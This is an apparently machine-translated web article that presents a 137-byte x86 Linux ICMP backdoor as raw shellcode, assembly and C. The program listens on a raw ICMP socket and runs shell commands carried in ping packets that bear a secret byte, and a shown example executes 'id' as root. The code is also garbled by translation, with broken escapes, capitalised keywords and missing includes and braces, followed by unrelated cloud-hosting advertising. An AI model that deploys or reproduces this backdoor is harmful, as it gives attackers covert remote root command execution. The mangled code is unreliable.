There are some backdoors in many protocol applications. For example, the Linux ICMP backdoor we will introduce today. Next, let's take a detailed look at the specific content about the 137-byte remote ICMP backdoor in Linux. Use the Ping Control Program:
/*
X86 linux icmp bind shellcode (137 bytes) by gloomy@netric.org
[Example]
Main:/home/gloomy/security/shellcode/linux/icmp #./icmp
Size of shellcode = 137
Main:/home/gloomy/security/shellcode/linux/icmp # ping-p 992f7573722f62696e2f69643e6f7574-c 1-s 26 localhost
PATTERN: 0x992f7573722f62696e2f69643e6f7574 (\ x99/usr/bin/id> out)
34 bytes from 127.0.0.1: icmp_seq = 0 ttl = 64 time = 0.5 MS
Main:/home/gloomy/security/shellcode/linux/icmp # cat out
Uid = 0 (root) gid = 0 (root) groups = 0 (root)
Main:/home/gloomy/security/shellcode/linux/icmp #
*/
# Include
# Include
# Include
# Include
# Define SECRET_CHAR "\ x99"
Char shell [] =
"\ X31 \ xc0 \ x31 \ xdb \ x31 \ xc9 \ xb0 \ x66"
"\ X43 \ x41 \ x51 \ xb1 \ x03 \ x51 \ x49 \ x51"
"\ X89 \ xe1 \ xcd \ x80 \ x89 \ xc2 \ xb0 \ x02"
"\ Xcd \ x80 \ x31 \ xdb \ x39 \ xc3 \ x75 \ x55"
"\ X31 \ xc0 \ x31 \ xdb \ xb0 \ x10 \ x50 \ xb0"
"\ Xff \ x54 \ x54 \ x53 \ x50 \ x55 \ x52 \ x89"
"\ Xe1 \ xb0 \ x66 \ xb3 \ x0c \ xcd \ x80 \ x89"
"\ Xe9 \ x01 \ xc1 \ x31 \ xc0 \ x88 \ x41 \ xfe"
"\ Xb0 \ x25 \ x01 \ xc5 \ xb0" SECRET_CHAR
"\ X32 \ x45 \ xff \ x75 \ xd5 \ xb0 \ x02 \ xcd"
"\ X80 \ x31 \ xdb \ x39 \ xc3 \ x74 \ x25 \ xeb"
"\ Xc9 \ x31 \ xc0 \ x31 \ xdb \ xb3 \ x02 \ xb0"
"\ X06 \ xcd \ x80 \ x5b \ x89 \ xd9 \ x88 \ x43"
"\ X07 \ x80 \ xc1 \ x08 \ x50 \ x55 \ x51 \ x53"
"\ X89 \ xe1 \ x99 \ xb0 \ x0b \ xcd \ x80 \ x31"
"\ Xc0 \ x40 \ xcd \ x80 \ xe8 \ xd8 \ xff"
"\ Xff"
"/Bin/sh-c ";
Void asm_code (){
_ Asm ("
Xorl % eax, % eax
Xorl % ebx, % ebx
Xorl % ecx, % ecx
Movb $0x66, % al
Incl % ebx
Incl % ecx
Push % ecx
Movb $0x3, % cl
Push % ecx
Decl % ecx
Push % ecx
Movl % esp, % ecx
Int $0x80/* socket ();*/
Movl % eax, % edx
Movb $0x2, % al
Int $0x80/* fork ();*/
Xorl % ebx, % ebx
Cmpl % eax, % ebx
Jne exit
Endlessloop:
Xorl % eax, % eax
Xorl % ebx, % ebx
Movb $0x10, % al
Push % eax
Movb $ 0xff, % al
Push % esp
Push % esp
Push % ebx
Push % eax
Push % ebp
Push % edx
Movl % esp, % ecx
Movb $0x66, % al
Movb $ 0x0c, % bl
Int $0x80/* recvfrom ();*/
Movl % ebp, % ecx
Addl % eax, % ecx
Xorl % eax, % eax
Movb % al,-2 (% ecx)
Movb $0x25, % al
Addl % eax, % ebp
Movb $0x99, % al/* SECRET_CHAR */
Xorb-1 (% ebp), % al
Jnz endlessloop
Movb $0x2, % al
Int $0x80/* fork ();*/
Xorl % ebx, % ebx
Cmpl % eax, % ebx
Je stack
Jmp endlessloop
Execve:
Xorl % eax, % eax
Xorl % ebx, % ebx
Movb $0x2, % bl
Movb $0x6, % al
Int $0x80/* close ();*/
Pop % ebx
Movl % ebx, % ecx
Movb % al, 0x7 (% ebx)
Addb $0x8, % cl
Push % eax
Push % ebp
Push % ecx
Push % ebx
Movl % esp, % ecx
Cdq
Movb $ 0xb, % al
Int $0x80/* execve ();*/
Exit:
Xorl % eax, % eax
Incl % eax
Int $0x80/* exit ();*/
Stack:
Call execve
. String \ "/bin/sh-c \"
");
}
Void c_code (){
Int fd;
Int nb = 0;
Struct sockaddr_in them;
Int them_size = sizeof (struct sockaddr );
Char buf [256];
Char * prog [] = {"/bin/sh", "-c", & buf [37], NULL };
Fd = socket (2, 3, 1 );
If (fork ()> 0) exit (0 );
While (1 ){
While (! (Nb = recvfrom (fd, buf, 255, 0, (struct sockaddr *) & them, & them_size )));
Buf [nb-1] = 0;
If (buf [36] = (char) SECRET_CHAR)
If (fork () = 0) {close (2); execve (prog [0], prog, NULL );}
}
}
Int main (int c, char * v []) {
Void (* I )();
I = (void (*) () shell;
Fprintf (stderr, "Size of shellcode = % d \ n", strlen (shell ));
I ();
Return 0;
Then, the specific Linux ICMP backdoor viewing method is displayed.
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
